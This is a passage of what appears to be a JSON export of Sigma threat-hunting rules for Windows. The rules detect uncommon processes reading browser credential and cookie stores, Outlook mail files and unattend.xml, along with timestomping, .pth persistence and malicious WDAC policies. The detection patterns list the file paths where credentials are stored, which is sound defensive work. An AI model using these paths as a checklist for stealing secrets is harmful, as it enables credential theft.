'C:\\Program Files\\'\n    filter_optional_defender:\n        SourceImage|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_browsers_chromium_sensitive_files.yml",
    "content": "title: Access To Chromium Browsers Sensitive Files By Uncommon Applications\nid: c5f37810-a85f-4186-81e9-33f23abb4141\nstatus: test\ndescription: |\n    Detects file access requests to chromium based browser sensitive files by uncommon processes.\n    Could indicate potential attempt of stealing sensitive information.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\User Data\\Default\\Cookies'\n            - '\\User Data\\Default\\History'\n            - '\\User Data\\Default\\Network\\Cookies'\n            - '\\User Data\\Default\\Web Data'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_browsers_credential.yml",
    "content": "title: Access To Browser Credential Files By Uncommon Applications\nid: 91cb43db-302a-47e3-b3c8-7ede481e27bf\nrelated:\n    - id: 4b60e527-ec73-4b47-8cb3-f02ad927ca65\n      type: similar\nstatus: test\ndescription: |\n    Detects file access requests to browser credential stores by uncommon processes.\n    Could indicate potential attempt of credential stealing.\n    Requires heavy baselining before usage\nreferences:\n    - https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users\n    - https://github.com/lclevy/firepwd\nauthor: frack113, X__Junior (Nextron Systems)\ndate: 2022-04-09\nmodified: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection_ie:\n        FileName|endswith: '\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat'\n    selection_firefox:\n        FileName|endswith:\n            - '\\cookies.sqlite'\n            - '\\places.sqlite'\n            - 'release\\key3.db'  # Firefox\n            - 'release\\key4.db'  # Firefox\n            - 'release\\logins.json' # Firefox\n    selection_chromium:\n        FileName|contains:\n            - '\\User Data\\Default\\Login Data'\n            - '\\User Data\\Local State'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_office_outlook_mail_credential.yml",
    "content": "title: Access To Windows Outlook Mail Files By Uncommon Applications\nid: fc3e237f-2fef-406c-b90d-b3ae7e02fa8f\nstatus: test\ndescription: |\n    Detects file access requests to Windows Outlook Mail by uncommon processes.\n    Could indicate potential attempt of credential stealing.\n    Requires heavy baselining before usage\nreferences:\n    - https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2\n    - https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows\nauthor: frack113\ndate: 2024-05-10\nmodified: 2024-07-29\ntags:\n    - attack.t1070.008\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection_unistore:\n        FileName|contains: '\\AppData\\Local\\Comms\\Unistore\\data'\n    selection_unistoredb:\n        FileName|endswith: '\\AppData\\Local\\Comms\\UnistoreDB\\store.vol'\n    filter_main_system:\n        Image: 'System'\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\n# Note: Increase after initial baseline\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_gpo_access_uncommon_process.yml",
    "content": "title: Access To Sysvol Policies Share By Uncommon Process\nid: 8344c19f-a023-45ff-ad63-a01c5396aea0\nstatus: test\ndescription: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes\nreferences:\n    - https://github.com/vletoux/pingcastle\nauthor: frack113\ndate: 2023-12-21\ntags:\n    - attack.credential-access\n    - attack.t1552.006\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|startswith: '\\\\'\n        FileName|contains|all:\n            - '\\sysvol\\'\n            - '\\Policies\\'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\explorer.exe'\n            - ':\\Windows\\system32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_reg_and_hive.yml",
    "content": "title: Access To .Reg/.Hive Files By Uncommon Applications\nid: 337a31c6-46c4-46be-886a-260d7aa78cac\nstatus: test\ndescription: Detects file access requests to files ending with either the \".hive\"/\".reg\" extension, usually associated with Windows Registry backups.\nreferences:\n    - https://github.com/tccontre/Reg-Restore-Persistence-Mole\nauthor: frack113\ndate: 2023-09-15\nmodified: 2024-07-29\ntags:\n    - attack.t1112\n    - attack.defense-evasion\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith:\n            - '.hive'\n            - '.reg'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_susp_unattend_xml.yml",
    "content": "title: Unattend.XML File Access Attempt\nid: 76a26006-0942-430b-8249-bd51d448f8e5\nstatus: test\ndescription: |\n    Detects attempts to access the \"unattend.xml\" file, where credentials might be stored.\n    This file is used during the unattended windows install process.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_access\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith: '\\Panther\\unattend.xml'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_change/file_change_win_date_changed_to_another_year.yml",
    "content": "title: File Creation Date Changed to Another Year\nid: 558eebe5-f2ba-4104-b339-36f7902bcc1a\nstatus: test\ndescription: |\n    Detects when the file creation time is changed to a year before 2020.\n    Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\n    Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n    In order to use this rule in production, it is recommended to first baseline normal behavior in your environment and then tune the rule accordingly.\n    Hunting Recommendation: Focus on files with creation times set to years significantly before the current date, especially those in user-writable directories.\n    Correlate with process execution logs to identify the source of the modification and investigate any unsigned or suspicious binaries involved.\nreferences:\n    - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-12\nmodified: 2026-01-20\ntags:\n    - attack.t1070.006\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_change\n    product: windows\ndetection:\n    selection:\n        PreviousCreationUtcTime|startswith: '202'\n    filter_main_creation_time:\n        CreationUtcTime|startswith: '202'\n    filter_main_program_files:\n        - TargetFilename|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n        - Image|startswith:\n              - 'C:\\Program Files\\'\n              - 'C:\\Program Files (x86)\\'\n    filter_optional_updates:\n        - Image:\n              - 'C:\\Windows\\system32\\ProvTool.exe'\n              - 'C:\\Windows\\System32\\usocoreworker.exe'\n              - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n        - TargetFilename|startswith: 'C:\\ProgramData\\USOPrivate\\UpdateStore\\'\n        - TargetFilename|endswith:\n              - '.tmp'\n              - '.temp'\n    filter_optional_cab:\n        Image|startswith: 'C:\\WINDOWS\\System32\\'\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\svchost.exe'\n            - '\\sihclient.exe'\n        TargetFilename|endswith: '.cab'\n    filter_optional_msiexec:\n        Image: 'C:\\Windows\\system32\\msiexec.exe'\n    filter_optional_vcredist:\n        Image|startswith: 'C:\\Windows\\Temp\\'\n        Image|endswith: '\\VCREDI~1.EXE'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Changes made to or by the local NTP service\n    - Software installations and updates\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_delete/file_delete_win_zone_identifier_ads.yml",
    "content": "title: ADS Zone.Identifier Deleted\nid: 7eac0a16-5832-4e81-865f-0268a6d19e4b\nrelated:\n    - id: 3109530e-ab47-4cc6-a953-cac5ebcc93ae\n      type: similar\nstatus: test\ndescription: Detects the deletion of the \"Zone.Identifier\" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.\nreferences:\n    - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\nauthor: frack113\ndate: 2023-09-04\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith: ':Zone.Identifier'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_dump_file_creation.yml",
    "content": "title: DMP/HDMP File Creation\nid: 3a525307-d100-48ae-b3b9-0964699d7f97\nstatus: test\ndescription: Detects the creation of a file with the \".dmp\"/\".hdmp\" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: selection\nfalsepositives:\n    - Likely during crashes of software\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_pfx_file_creation.yml",
    "content": "title: PFX File Creation\nid: dca1b3e8-e043-4ec8-85d7-867f334b5724\nstatus: test\ndescription: |\n    Detects the creation of PFX files (Personal Information Exchange format).\n    PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:\n\n        - Exfiltrate digital certificates for impersonation or signing malicious code\n        - Establish persistent access through certificate-based authentication\n        - Bypass security controls that rely on certificate validation\n\n    Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/14\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1552.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.pfx'\n    filter_optional_onedrive:\n        Image:\n            - 'C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n            - 'C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe'\n        TargetFilename|endswith: '\\OneDrive\\CodeSigning.pfx'\n    filter_optional_visual_studio:\n        TargetFilename|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n    filter_optional_cmake:\n        TargetFilename|startswith: 'C:\\Program Files\\CMake\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - System administrators legitimately managing certificates and PKI infrastructure\n    - Development environments where developers create test certificates for application signing\n    - Automated certificate deployment tools and scripts used in enterprise environments\n    - Software installation processes that include certificate provisioning (e.g., web servers, VPN clients)\n    - Certificate backup and recovery operations performed by IT staff\n    - Build systems and CI/CD pipelines that generate code signing certificates\n    - Third-party applications that create temporary certificates for secure communications\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - Windows\nid: e3652ba3-0ad8-4010-a957-b7ba369e7bac\nrelated:\n    - id: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce # Linux\n      type: similar\n    - id: 4f394635-13ef-4599-b677-3353e0f84f55 # MacOS\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\' # Covers both Virtual envs and default paths\n        TargetFilename|endswith: '.pth'\n    filter_main_python:\n        Image|endswith: '\\python.exe'\n        TargetFilename|endswith:\n            - '\\pywin32.pth' # VS Studio Python extension\n            - '\\distutils-precedence.pth'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_scheduled_task_creation.yml",
    "content": "title: Scheduled Task Created - FileCreation\nid: a762e74f-4dce-477c-b023-4ed81df600f9\nstatus: test\ndescription: Detects the creation of a scheduled task via file creation.\nreferences:\n    - https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/\n    - https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nauthor: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team\ndate: 2023-09-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - attack.s0111\n    - car.2013-08-001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n    condition: selection\nfalsepositives:\n    - Normal behaviour on Windows\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_susp_binary_dropper.yml",
    "content": "title: Creation of an Executable by an Executable\nid: 297afac9-5d02-4138-8c58-b977bac60556\nstatus: test\ndescription: Detects the creation of an executable by another executable.\nreferences:\n    - Internal Research\nauthor: frack113\ndate: 2022-03-09\nmodified: 2025-02-24\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '.exe'\n        TargetFilename|endswith: '.exe'\n    filter_main_generic_1:\n        Image|endswith:\n            - ':\\Windows\\System32\\msiexec.exe'\n            - ':\\Windows\\system32\\cleanmgr.exe'\n            - ':\\Windows\\explorer.exe'\n            - ':\\WINDOWS\\system32\\dxgiadaptercache.exe'\n            - ':\\WINDOWS\\system32\\Dism.exe'\n            - ':\\Windows\\System32\\wuauclt.exe'\n    filter_main_update:\n        # Security_UserID: S-1-5-18\n        # Example:\n        #   TargetFilename: C:\\Windows\\SoftwareDistribution\\Download\\803d1df4c931df4f3e50a022cda56e88\\WindowsUpdateBox.exe\n        Image|endswith: ':\\WINDOWS\\system32\\svchost.exe'\n        TargetFilename|contains: ':\\Windows\\SoftwareDistribution\\Download\\'\n    filter_main_upgrade:\n        Image|endswith: ':\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            # Example:\n            #   This example was seen during windows upgrade\n            #   TargetFilename: :\\WUDownloadCache\\803d1df4c931df4f3e50a022cda56e29\\WindowsUpdateBox.exe\n            - ':\\WUDownloadCache\\'\n            - '\\WindowsUpdateBox.exe'\n    filter_main_windows_update_box:\n        # This FP was seen during Windows Upgrade\n        # ParentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wuauserv\n        Image|contains: ':\\WINDOWS\\SoftwareDistribution\\Download\\'\n        Image|endswith: '\\WindowsUpdateBox.Exe'\n        TargetFilename|contains: ':\\$WINDOWS.~BT\\Sources\\'\n    filter_main_tiworker:\n        Image|contains: ':\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_programfiles:\n        - Image|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n        - TargetFilename|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n    filter_main_defender:\n        Image|contains:\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\'\n            - ':\\Program Files\\Windows Defender\\'\n    filter_main_windows_apps:\n        TargetFilename|contains: '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n    filter_main_teams:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\stage\\Squirrel.exe'\n            - '\\AppData\\Local\\Microsoft\\SquirrelTemp\\tempb\\'\n    filter_main_mscorsvw:\n        # Example:\n        #   ParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\" ExecuteQueuedItems /LegacyServiceBehavior\n        #   Image: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\4f8c-0\\MSBuild.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\49bc-0\\testhost.net47.x86.exe\n        #       TargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\39d8-0\\fsc.exe\n        Image|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm\\'\n            - ':\\Windows\\Microsoft.NET\\FrameworkArm64\\'\n        Image|endswith: '\\mscorsvw.exe'\n        TargetFilename|contains: ':\\Windows\\assembly\\NativeImages_'\n    filter_main_vscode:\n        Image|contains: '\\AppData\\Local\\'\n        Image|endswith: '\\Microsoft VS Code\\Code.exe'\n        TargetFilename|contains: '\\.vscode\\extensions\\'\n    filter_main_githubdesktop:\n        Image|endswith: '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n        # Example TargetFileName:\n        #   \\AppData\\Local\\SquirrelTemp\\tempb\\lib\\net45\\GitHubDesktop_ExecutionStub.exe\n        #   \\AppData\\Local\\SquirrelTemp\\tempb\\lib\\net45\\squirrel.exe\n        TargetFilename|contains: '\\AppData\\Local\\SquirrelTemp\\'\n    filter_main_windows_temp:\n        - Image|contains: ':\\WINDOWS\\TEMP\\'\n        - TargetFilename|contains: ':\\WINDOWS\\TEMP\\'\n    filter_optional_python:\n        Image|contains: '\\Python27\\python.exe'\n        TargetFilename|contains:\n            - '\\Python27\\Lib\\site-packages\\'\n            - '\\Python27\\Scripts\\'\n            - '\\AppData\\Local\\Temp\\'\n    filter_optional_squirrel:\n        Image|contains: '\\AppData\\Local\\SquirrelTemp\\Update.exe'\n        TargetFilename|contains: '\\AppData\\Local'\n    filter_main_temp_installers:\n        - Image|contains: '\\AppData\\Local\\Temp\\'\n        - TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n    filter_optional_chrome:\n        Image|endswith: '\\ChromeSetup.exe'\n        TargetFilename|contains: '\\Google'\n    filter_main_dot_net:\n        Image|contains: ':\\Windows\\Microsoft.NET\\Framework'\n        Image|endswith: '\\mscorsvw.exe'\n        TargetFilename|contains: ':\\Windows\\assembly'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    # Please contribute to FP to increase the level\n    - Software installers\n    - Update utilities\n    - 32bit applications launching their 64bit versions\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_vscode_tunnel_indicators.yml",
    "content": "title: VsCode Code Tunnel Execution File Indicator\nid: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d\nstatus: test\ndescription: |\n    Detects the creation of a file with the name \"code_tunnel.json\", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\code_tunnel.json'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of VsCode tunneling functionality will also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_wdac_policy_creation_in_codeintegrity_folder.yml",
    "content": "title: WDAC Policy File Creation In CodeIntegrity Folder\nid: 121b25f7-b9d6-4b37-afa0-cba317ec52f3\nstatus: experimental\ndescription: |\n    Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\\Windows\\System32\\CodeIntegrity\\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.\nreferences:\n    - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n    - https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2025-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - detection.threat-hunting\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: By default the file_event log source might not contain the IntegrityLevel of the Process. It should be collected in order to use this rule'\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Windows\\System32\\CodeIntegrity\\'\n        TargetFilename|endswith:\n            - '.cip'\n            - '.p7b'\n        IntegrityLevel: 'High'\n    condition: selection\nfalsepositives:\n    - May occur legitimately as part of admin activity, but rarely with interactive elevation.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_event/file_event_win_webdav_tmpfile_creation.yml",
    "content": "title: WebDAV Temporary Local File Creation\nid: 4c55738d-72d8-490e-a2db-7969654e375f\nrelated:\n    - id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398\n      type: similar\nstatus: test\ndescription: Detects the creation of WebDAV temporary files with potentially suspicious extensions\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\n    - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\nauthor: Micah Babinski\ndate: 2023-08-21\ntags:\n    - attack.initial-access\n    - attack.resource-development\n    - attack.t1584\n    - attack.t1566\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\'\n        TargetFilename|endswith:\n            - '.7z'\n            - '.bat'\n            - '.dat'\n            - '.ico'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.rar'\n            - '.vbe'\n            - '.vbs'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Legitimate use of WebDAV in an environment\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_rename/file_rename_win_non_dll_to_dll_ext.yml",
    "content": "title: Non-DLL Extension File Renamed With DLL Extension\nid: bbfd974c-248e-4435-8de6-1e938c79c5c1\nstatus: test\ndescription: |\n    Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.\nreferences:\n    - https://twitter.com/ffforward/status/1481672378639912960\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location\nauthor: frack113\ndate: 2022-02-19\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1036.008\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: file_rename\n    definition: 'Requirements: Microsoft-Windows-Kernel-File Provider with at least the KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH keyword'\ndetection:\n    selection:\n        TargetFilename|endswith: '.dll'\n    filter_main_dll:\n        # Note: To avoid file renames\n        SourceFilename|endswith: '.dll'\n    filter_main_installers:\n        SourceFilename|endswith: '.tmp'\n    filter_main_empty_source:\n        SourceFilename: ''\n    filter_main_null_source:\n        SourceFilename: null\n    filter_main_tiworker:\n        Image|contains: ':\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_main_upgrade:\n        - Image|endswith: ':\\Windows\\System32\\wuauclt.exe'\n        - TargetFilename|contains: ':\\$WINDOWS.~BT\\Sources\\'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n    filter_optional_squirrel:\n        SourceFilename|contains: '\\SquirrelTemp\\temp'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely from installers and temporary locations\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/image_load/image_load_dll_amsi_uncommon_process.yml",
